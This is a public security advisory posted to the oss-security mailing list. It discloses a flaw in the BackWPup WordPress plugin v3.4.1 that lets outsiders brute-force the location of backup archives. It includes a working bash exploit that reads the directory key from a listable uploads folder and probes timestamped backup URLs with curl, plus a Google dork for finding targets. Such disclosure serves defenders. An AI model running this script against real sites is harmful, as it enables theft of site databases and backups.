[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup fi
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2017-09-27 16:13:47
Message-ID: A9D8E9DF-36AC-4F46-BAF1-0C6E002E0D71 () me ! com
[Download RAW message or body]
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file \
download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation \
including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and \
many more." Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It \
creates a random string to obscure the location, but it uses that same string to create the \
storage directory under wp-content/uploads/ which in most installations of WordPress allows \
file listings.
Someone looking to steal a copy of the database could simply list the directories in /uploads \
to find that random string and then brute force the location of the file as its structure is \
just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is \
available for that day. Filename format:
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s
Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second
https://wordpress.org/plugins/backwpup
Exploit Code:
• #!/bin/bash
• #Exploit for Wordpress Plugin BackWPup v3.4.1
• #Download https://wordpress.org/plugins/backwpup
• #CWE-552: Files or Directories Accessible to External Parties
• #CVE-ID: CVE-2017-2551
• #Google Dork: inurl:wp-content/uploads/backwpup
•
•
• #Add banner about vulnerability
•
• KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print \
$2}'` •
• #Add error checking here
• echo "[+] Getting Unique Key $KEY"
• DIR="backwpup-$KEY-backups"
• echo "[+] Checking directory $DIR"
• WPATH="$DIR/backwpup_$KEY"
• echo "[+] Creating Path: $WPATH"
• #use date command here for the default date of current day
• MONTH=09
• DAY=07
• YEAR=2017
• Z=0
•
• echo "[+] Scanning website for available backups:"
• for y in `seq -w 0 23`; do
• for x in `seq -w 0 59`; do
• Y=`echo "scale=2;($Z/86000)*100"|bc`;
• echo -ne \
"\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\ \
b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\ \
b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH \
$Y%" • for z in `seq -w 0 59`; do
• Z=$(( $Z + 1 ));
• \
CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; \
• RESULT=`curl -s --head $CWPATH|grep 200`; • if [ -n \
"$RESULT" ]; then • echo ""
• echo "[+] Location $CWPATH Found";
• echo "[+] Received $RESULT";
• echo "Downloading......";
• # wget $CWPATH
• exit;
• fi;
• done
• done
• done
• echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup=
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic